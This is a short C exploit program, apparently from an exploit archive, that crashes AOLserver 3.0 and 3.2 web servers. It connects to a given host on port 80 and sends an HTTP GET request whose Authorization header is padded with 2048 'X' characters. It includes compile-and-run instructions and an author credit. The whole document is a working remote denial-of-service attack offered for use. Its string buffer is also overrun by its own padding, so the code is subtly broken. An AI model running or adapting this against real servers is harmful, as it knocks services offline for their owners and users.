AOLserver v3.0 and 3.2 remote denial of service bug. Sends a long HTTP request.
090d176d5352846828025a910558d26b49d012fe1aae38fd3838f573072a9a36
/* AOLserver will crash when a long authorization string is passed to it.
Tested on 3.0 and 3.2 but may work on other versions to
3.3.1 and 3.4 are not vulnerable
gcc -o aolcrash aolcrash.c; ./aolchash host
exty <grumb@techemail.com>
*/
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
main(int argc, char *argv[])
{
int sockfd, i;
char str[2098];
struct hostent *he;
struct sockaddr_in their_addr;
printf("[X] aolcrash.c by external [X]\n");
if (argc != 2) {
printf("usage: %s <addr>\n", argv[0]);
exit(1);
}
if((he=gethostbyname(argv[1])) == NULL) {
herror("gethostbyname");
exit(1);
}
strcpy(str, "GET / HTTP/1.0\nAuthorization: Basic ");
for(i=0; i<2048; i++)
strcat(str, "X");
strcat(str, "\r\n\r\n");
their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(80);
their_addr.sin_addr = (*(struct in_addr *)he->h_addr);
bzero(&their_addr.sin_zero, 8);
if ((sockfd=socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket");
exit(1);
}
if(connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) {
perror("connect");
exit(1);
}
if(send(sockfd, str, 2098, 0) == -1) {
perror("send");
exit(1);
}
printf("\nexploit string sent\n");
close(sockfd);
}